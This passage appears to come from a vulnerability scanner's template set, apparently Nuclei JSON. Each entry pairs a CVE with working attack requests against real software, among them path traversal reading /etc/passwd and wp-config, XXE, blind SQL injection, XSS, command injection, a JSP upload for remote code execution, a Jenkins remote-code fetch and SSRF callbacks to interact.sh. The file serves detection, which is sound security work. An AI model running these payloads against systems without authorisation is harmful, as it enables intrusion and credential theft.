Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/select_project.php?url=http://interact.sh","{{BaseURL}}/clock_status.php?current_page=http://interact.sh"],"stop-at-first-match":true,"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2018-18264","info":{"name":"Kubernetes Dashboard <1.10.1 - Authentication Bypass","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/v1/namespaces/kube-system/secrets/kubernetes-dashboard-certs","{{BaseURL}}/k8s/api/v1/namespaces/kube-system/secrets/kubernetes-dashboard-certs"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body, \"apiVersion\") && contains(body, \"objectRef\")"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-10823","info":{"name":"D-Link Routers - Remote Command Injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/chkisg.htm%3FSip%3D1.1.1.1%20%7C%20cat%20%2Fetc%2Fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-20985","info":{"name":"WordPress Payeezy Pay <=2.97 - Local File Inclusion","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/wp-content/plugins/wp-payeezy-pay/donate.php"],"body":"x_login=../../../wp-config","matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["The base configuration for WordPress","define( 'DB_NAME',","define( 'DB_PASSWORD',"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-7700","info":{"name":"DedeCMS 5.7SP2 - Cross-Site Request Forgery/Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/tag_test_action.php?url=a&token=&partcode={dede:field%20name=%27source%27%20runphp=%27yes%27}echo%20md5%28%22CVE-2018-7700%22%29%3B{/dede:field}"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["4cc32a3a81d2bb37271934a48ce4468a"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-10095","info":{"name":"Dolibarr <7.0.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/dolibarr/adherents/cartes/carte.php?&mode=cardlogin&foruserlogin=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&model=5160&optioncss=print"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-8033","info":{"name":"Apache OFBiz 16.11.04 - XML Entity Injection","severity":"high"},"requests":[{"raw":["POST /webtools/control/xmlrpc HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nAccept-Language: en\nContent-Type: application/xml\n\n<?xml version=\"1.0\"?><!DOCTYPE x [<!ENTITY disclose SYSTEM \"file://///etc/passwd\">]><methodCall><methodName>&disclose;</methodName></methodCall>\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-1000856","info":{"name":"DomainMOD 4.11.01 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_username={{username}}&new_password={{password}}\n","POST /segments/add.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_name=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&raw_domain_list=test.com&new_description=test&new_notes=test\n","GET /segments/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n"],"cookie-reuse":true,"host-redirects":true,"max-redirects":3,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(1)</script></a>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-6008","info":{"name":"Joomla! Jtag Members Directory 5.3.7 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jtagmembersdirectory&task=attachment&download_file=../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-18775","info":{"name":"Microstrategy Web 7 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/microstrategy7/Login.asp?Server=Server001&Project=Project001&Port=0&Uid=Uid001&Msg=%22%3E%3Cscript%3Ealert(/{{randstr}}/)%3B%3C%2Fscript%3E%3C"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"><script>alert(/{{randstr}}/);</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-11227","info":{"name":"Monstra CMS <=3.0.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /admin/index.php?id=pages HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlogin=\"><svg/onload=alert(document.domain)>&password=xxxxxx&login_submit=Log+In\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["><svg/onload=alert(document.domain)>","Monstra"],"case-insensitive":true,"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-5715","info":{"name":"SugarCRM 3.5.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?action=Login&module=Users&print=a&%22%2F%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["&\"/><script>alert(1)</script>=&\"><< Back</a><br><br>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-1000600","info":{"name":"Jenkins GitHub Plugin <=1.29.1 - Server-Side Request Forgery","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.github.config.GitHubTokenCredentialsCreator/createTokenByPassword?apiUrl=http://{{interactsh-url}}"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2018-19749","info":{"name":"DomainMOD 4.11.01 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_username={{username}}&new_password={{password}}\n","POST /assets/add/account-owner.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_owner=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_notes=\n","GET /assets/account-owners.php HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"host-redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(header_3, \"text/html\")","contains(body_3, '><script>alert(document.domain)</script></a>')"],"condition":"and"}]}]},{"id":"CVE-2018-18069","info":{"name":"WordPress sitepress-multilingual-cms 3.6.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}/wp-admin/admin.php"],"body":"icl_post_action=save_theme_localization&locale_file_name_en=EN\"><script>alert(0);</script>\n","host-redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["contains(tolower(header), \"text/html\")","contains(set_cookie, \"_icl_current_admin_language\")","contains(body, \"\\\"><script>alert(0);</script>\")"],"condition":"and"}]}]},{"id":"CVE-2018-2791","info":{"name":"Oracle Fusion Middleware WebCenter Sites - Cross-Site Scripting","severity":"high"},"requests":[{"raw":["GET /cs/Satellite?pagename=OpenMarket/Gator/FlexibleAssets/AssetMaker/confirmmakeasset&cs_imagedir=qqq%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{BaseURL}}\n","GET /cs/Satellite?destpage=\"<h1xxx\"><script>alert(document.domain)</script>&pagename=OpenMarket%2FXcelerate%2FUIFramework%2FLoginError HTTP/1.1\nHost: {{BaseURL}}\n"],"stop-at-first-match":true,"matchers-condition":"or","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>/graphics/common/screen/dotclear.gif"]},{"type":"word","part":"body","words":["<script>alert(24)</script>","Missing translation key"],"condition":"and"}]}]},{"id":"CVE-2018-16159","info":{"name":"WordPress Gift Voucher <4.1.8 - Blind SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\naction=wpgv_doajax_front_template&template_id=1 and sleep(6)#\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"application/json\")","contains(body, \"images\") && contains(body, \"title\")"],"condition":"and"}]}]},{"id":"CVE-2018-3760","info":{"name":"Ruby On Rails - Local File Inclusion","severity":"high"},"requests":[{"raw":["GET /assets/file:%2f%2f/etc/passwd HTTP/1.1\nHost: {{Hostname}}\n","GET /assets/file:%2f%2f{{path}}/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/etc/passwd HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"path","regex":["/etc/passwd is no longer under a load path: (.*?),"],"internal":true,"part":"body"}]}]},{"id":"CVE-2018-1000130","info":{"name":"Jolokia Agent - JNDI Code Injection","severity":"high"},"requests":[{"raw":["POST /jolokia/read/getDiagnosticOptions HTTP/1.1\nHost: {{Hostname}}\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.\nContent-Type: application/x-www-form-urlencoded\n\n{\n   \"type\":\"read\",\n   \"mbean\":\"java.lang:type=Memory\",\n   \"target\":{\n      \"url\":\"service:jmx:rmi:///jndi/ldap://127.0.0.1:1389/o=tomcat\"\n   }\n}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Failed to retrieve RMIServer stub: javax.naming.CommunicationException: 127.0.0.1:1389"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-20462","info":{"name":"WordPress JSmol2WP <=1.07 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=saveFile&data=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&mimetype=text/html;%20charset=utf-8"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-18323","info":{"name":"Centos Web Panel 0.9.8.480 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin/index.php?module=file_editor&file=/../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-8006","info":{"name":"Apache ActiveMQ <=5.15.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin/queues.jsp?QueueFilter=yu1ey%22%3e%3cscript%3ealert(%221%22)%3c%2fscript%3eqb68"],"matchers-condition":"and","matchers":[{"type":"word","words":["\"><script>alert(\"1\")</script>"]},{"type":"word","part":"header","words":["/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-19386","info":{"name":"SolarWinds Database Performance Analyzer 11.1.457 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/iwc/idcStateError.iwc?page=javascript%3aalert(document.domain)%2f%2f"],"matchers-condition":"and","matchers":[{"type":"word","words":["<a href=\"javascript:alert(document.domain)//"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-18777","info":{"name":"Microstrategy Web 7 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/WebMstr7/servlet/mstrWeb?evt=3045&src=mstrWeb.3045&subpage=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-20011","info":{"name":"DomainMOD 4.11.01 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_username={{username}}&new_password={{password}}\n","POST /assets/add/category.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_category=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_stakeholder=&new_notes=\n","GET /assets/categories.php HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"host-redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(header_3, \"text/html\")","contains(body_3, \"><script>alert(document.domain)</script></a>\")"],"condition":"and"}]}]},{"id":"CVE-2018-9205","info":{"name":"Drupal avatar_uploader v7.x-1.0-beta8 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/sites/all/modules/avatar_uploader/lib/demo/view.php?file=../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-1000129","info":{"name":"Jolokia 1.3.7 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/jolokia/read<svg%20onload=alert(document.domain)>?mimeType=text/html","{{BaseURL}}/jolokia/read<svg%20onload=alert(document.domain)>?mimeType=text/html"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<svg onload=alert(document.domain)>","java.lang.IllegalArgumentException","No type with name"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-3810","info":{"name":"Oturia WordPress Smart Google Code Inserter <3.5 - Authentication Bypass","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/wp-admin/options-general.php?page=smartcode"],"body":"sgcgoogleanalytic=<script>console.log(\"document.domain\")</script>&sgcwebtools=&button=Save+Changes&action=savegooglecode","headers":{"Content-Type":"application/x-www-form-urlencoded"}},{"method":"GET","path":["{{BaseURL}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":["<script>console.log(\"document.domain\")</script>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-7490","info":{"name":"uWSGI PHP Plugin Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-8727","info":{"name":"Mirasys DVMS Workstation <=5.12.6 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/.../.../.../.../.../.../.../.../.../windows/win.ini"],"matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"}]}]},{"id":"CVE-2018-15961","info":{"name":"Adobe ColdFusion - Unrestricted File Upload Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=---------------------------24464570528145\n\n-----------------------------24464570528145\nContent-Disposition: form-data; name=\"file\"; filename=\"{{randstr}}.jsp\"\nContent-Type: image/jpeg\n\n<%@ page import=\"java.util.*,java.io.*\"%>\n<%@ page import=\"java.security.MessageDigest\"%>\n<%\nString cve = \"CVE-2018-15961\";\nMessageDigest alg = MessageDigest.getInstance(\"MD5\");\nalg.reset();\nalg.update(cve.getBytes());\nbyte[] digest = alg.digest();\nStringBuffer hashedpasswd = new StringBuffer();\nString hx;\nfor (int i=0;i<digest.length;i++){\n  hx =  Integer.toHexString(0xFF & digest[i]);\n  if(hx.length() == 1){hx = \"0\" + hx;}\n  hashedpasswd.append(hx);\n}\nout.println(hashedpasswd.toString());\n%>\n-----------------------------24464570528145\nContent-Disposition: form-data; name=\"path\"\n\n{{randstr}}.jsp\n-----------------------------24464570528145--\n","GET /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/{{randstr}}.jsp HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["ddbb3e76f92e78c445c8ecb392beb225"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-16670","info":{"name":"CirCarLife <4.3 - Improper Authentication","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/services/user/values.xml?var=STATUS"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["CirCarLife Scada"]},{"type":"word","part":"body","words":["<values><variable><id>","Reader.STATUS"],"condition":"and"}]}]},{"id":"CVE-2018-12296","info":{"name":"Seagate NAS OS 4.3.15.1 - Server Information Disclosure","severity":"high"},"requests":[{"raw":["POST /api/external/7.0/system.System.get_infos HTTP/1.1\nHost: {{Hostname}}\nReferer: {{BaseURL}}\n"],"matchers":[{"type":"word","part":"body","words":["\"version\":","\"serial_number\":"],"condition":"and"}],"extractors":[{"type":"regex","group":1,"regex":["\"version\": \"([0-9.]+)\""],"part":"body"}]}]},{"id":"CVE-2018-12675","info":{"name":"SV3C HD Camera L Series - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/web/cgi-bin/hi3510/param.cgi?cmd=setmobilesnapattr&cururl=http%3A%2F%2Finteract.sh"],"matchers":[{"type":"word","part":"body","words":["<META http-equiv=\"Refresh\" content=\"0;URL=http://interact.sh\">"]}]}]},{"id":"CVE-2018-20470","info":{"name":"Tyto Sahi pro 7.x/8.x - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/_s_/dyn/Log_highlight?href=../../../../windows/win.ini&n=1#selected"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-7251","info":{"name":"Anchor CMS 0.12.3 - Error Log Exposure","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/anchor/errors.log"],"matchers":[{"type":"word","words":["\"date\":","\"message\":","\"trace\":["],"condition":"and"}]}]},{"id":"CVE-2018-16133","info":{"name":"Cybrotech CyBroHttpServer 1.0.3 - Local File Inclusion","severity":"medium"},"requests":[{"raw":["GET \\..\\..\\..\\..\\Windows\\win.ini HTTP/1.1\nHost: {{Hostname}}\n\n"],"unsafe":true,"matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"}]}]},{"id":"CVE-2018-20463","info":{"name":"WordPress JSmol2WP <=1.07 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=getRawDataFromDatabase&query=php://filter/resource=../../../../wp-config.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["'DB_USER',","'DB_PASSWORD'"],"condition":"and"},{"type":"word","part":"header","words":["text/plain"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-7467","info":{"name":"AxxonSoft Axxon Next - Local File Inclusion","severity":"high"},"requests":[{"raw":["GET //css//..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows\\win.ini HTTP/1.1\nHost: {{Hostname}}\n\n"],"unsafe":true,"matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"}]}]},{"id":"CVE-2018-1000861","info":{"name":"Jenkins - Remote Command Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(name=%27test%27,%20root=%27http://aaa%27)%0a@Grab(group=%27package%27,%20module=%27vulntest%27,%20version=%271%27)%0aimport%20Payload;"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["package#vulntest"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-11473","info":{"name":"Monstra CMS 3.0.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /users/registration HTTP/1.1\nHost: {{Hostname}}\n","POST /users/registration HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ncsrf={{csrf}}&login=test&password=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&email=teest%40gmail.com&answer=test&register=Register\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["><script>alert(document.domain)</script>","Monstra"],"case-insensitive":true,"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"csrf","group":1,"regex":["id=\"csrf\" name=\"csrf\" value=\"(.*)\">"],"internal":true,"part":"body"}]}]},{"id":"CVE-2018-12998","info":{"name":"Zoho manageengine - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet?operation=11111111%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-16668","info":{"name":"CirCarLife <4.3 - Improper Authentication","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/html/repository"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["CirCarLife Scada"]},{"type":"word","part":"body","words":["** Platform sources **","** Application sources **"],"condition":"and"}]}]},{"id":"CVE-2018-14574","info":{"name":"Django - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}//www.interact.sh"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["Location: https://www.interact.sh","Location: http://www.interact.sh"]},{"type":"status","status":[301]}]}]},{"id":"CVE-2018-10093","info":{"name":"AudioCode 420HD - Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/command.cgi?cat%20/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["admin:.*:*sh$"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-1207","info":{"name":"Dell iDRAC7/8 Devices - Remote Code Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/login?LD_DEBUG=files"],"matchers":[{"type":"word","part":"response","words":["calling init: /lib/"]}]}]},{"id":"CVE-2018-8770","info":{"name":"Cobub Razor 0.8.0 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/tests/generate.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["Fatal error: Class 'PHPUnit_Framework_TestCase' not found in ","/application/third_party/CIUnit/libraries/CIUnitTestCase.php on line"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-1000671","info":{"name":"Sympa version =>6.2.16 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/sympa?referer=http://interact.sh&passwd=&previous_action=&action=login&action_login=&previous_list=&list=&email="],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2018-2392","info":{"name":"SAP Internet Graphics Server (IGS) - XML External Entity Injection","severity":"high"},"requests":[{"raw":["POST /XMLCHART HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary={{randstr_1}}\n\n--{{randstr_1}}\nContent-Disposition: form-data; name=\"{{randstr_2}}\"; filename=\"{{randstr_3}}.xml\"\nContent-Type: application/xml\n\n<?xml version='1.0' encoding='UTF-8'?>\n    <ChartData>\n      <Categories>\n        <Category>ALttP</Category>\n      </Categories>\n      <Series label=\"{{randstr_4}}\">\n        <Point>\n          <Value type=\"y\">12345</Value>\n        </Point>\n      </Series>\n    </ChartData>\n--{{randstr_1}}\nContent-Disposition: form-data; name=\"{{randstr_5}}\"; filename=\"{{randstr_6}}.xml\"\nContent-Type: application/xml\n\n<?xml version='1.0' encoding='UTF-8'?>\n    <!DOCTYPE Extension [<!ENTITY xxe SYSTEM \"/etc/passwd\">]>\n    <SAPChartCustomizing version=\"1.1\">\n      <Elements>\n        <ChartElements>\n          <Title>\n            <Extension>&xxe;</Extension>\n          </Title>\n        </ChartElements>\n      </Elements>\n    </SAPChartCustomizing>\n--{{randstr_1}}--\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Picture","Info","/output/"],"condition":"and"},{"type":"word","part":"body","words":["ImageMap","Errors"],"condition":"or"},{"type":"word","part":"header","words":["text/html","SAP Internet Graphics Server"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-19915","info":{"name":"DomainMOD <=4.11.01 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_username={{username}}&new_password={{password}}\n","POST /assets/add/host.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_host=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_url=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_notes=test\n","GET /assets/hosting.php HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"host-redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(header_3, \"text/html\")","contains(body_3, \"><script>alert(document.domain)</script></a>\")"],"condition":"and"}]}]},{"id":"CVE-2002-1131","info":{"name":"SquirrelMail 1.2.6/1.2.7 - Cross-Site Scripting","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/src/addressbook.php?%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E","{{BaseURL}}/src/options.php?optpage=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E","{{BaseURL}}/src/search.php?mailbox=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&what=x&where=BODY&submit=Search","{{BaseURL}}/src/search.php?mailbox=INBOX&what=x&where=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&submit=Search","{{BaseURL}}/src/help.php?chapter=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2009-4679","info":{"name":"Joomla! Portfolio Nexus - Remote File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_kif_nexus&controller=../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2009-1872","info":{"name":"Adobe Coldfusion <=8.0.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/CFIDE/wizards/common/_logintowizard.cfm?%22%3E%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2009-3318","info":{"name":"Joomla! Roland Breedveld Album 1.14 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_album&Itemid=128&target=../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2009-5020","info":{"name":"AWStats < 6.95 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/awstats/awredir.pl?url=interact.sh","{{BaseURL}}/cgi-bin/awstats/awredir.pl?url=interact.sh"],"stop-at-first-match":true,"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2009-5114","info":{"name":"WebGlimpse 2.18.7 - Directory 